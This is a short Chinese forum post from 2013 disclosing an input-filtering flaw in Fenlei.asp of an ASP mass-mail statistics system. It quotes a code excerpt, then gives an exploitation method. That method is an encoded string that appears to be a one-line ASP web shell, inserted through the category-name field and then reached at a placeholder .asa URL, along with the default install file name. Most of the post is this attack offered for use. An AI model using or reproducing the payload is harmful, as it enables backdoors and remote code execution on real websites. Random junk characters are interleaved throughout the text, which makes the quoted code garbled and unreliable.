找回密码
 立即注册
查看: 2299|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
0 Q/ u- H& Z- `" t0 p) v9 I
  E, g  \! v, n4 [& N6 \3 QIF Request.QueryString("Action")="del" Then
0 N. L9 r4 ]1 s* S  B" \ID=Request.QueryString("ID") ) }1 d* u2 E; r& F& L
IF Countss ("tui","Fenlei",ID )<>0 then - a0 S+ t! q) t7 V. ^
'略
6 V* H, x+ B4 U# O6 ^8 ]( OIF Request.QueryString("Action")="Add" Then : B! }7 U( C( ^8 W. B- h+ B
Tname=Request.Form("Typename") ( p0 N2 t- x. {
Set Rs=Server.CreateObject("adodb.Recordset")
8 K$ r+ z: j0 `# HSql="Select * From Fenlei Order by id Desc " ) h) n- V" H2 X( [+ r
Rs.Open Sql,Conn,1,3
: x8 M. d" r( }: {( G4 W  ?, zRs.Addnew
1 B$ @+ _1 f8 \3 b- wRs("Typename")=Tname % q  a! [4 t) F% K2 h$ V
'略 + m2 b$ Y* Z4 A4 r, d
Set Rs=Server.CreateObject("adodb.Recordset") 8 L! k3 t2 {# U* x6 _3 W+ d5 t
Sql="Select * From Fenlei Order by id Desc "
: j' V  _- T7 \- K" x4 Q, {  ERs.Open Sql,Conn,1,1 ( o- f; m8 u3 x$ U. S4 M
'略
4 a- o2 C- A8 E%>
9 b2 M7 Q: l/ w* E7 N% c! B3 C* V 5 M3 i% E" R# }; c* _1 j

; L, ]) k1 l+ n$ j3 _6 E+ z, h
5 H' R' S( I) [  V; o# Y/ K没有过滤,直接写入数据库。$ }3 x; O. q6 ?$ l4 u5 d7 ]* q7 n8 ^
) U7 e( _8 T% n
利用方法:
, M2 b- Q: h: C% H- @9 g0 [- y5 l
: K$ }1 r- ^- E' [/ l* I插入:┼攠數畣整爠煥敵瑳∨≡┩>
/ J2 i" p0 h' @# s% \ & @, S. v7 Y: a- f% h, Q  b+ @

, k, M; S1 g# A! M6 R4 O' u连接: http://www.xxx.com/###tongbaner.asa
* |" I" V- Y+ L'默认安装文件: 0 ?9 m  L, S0 k7 h( j  A3 J" }; F
'install.asp' k7 Q( z4 m; `7 I# S! y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表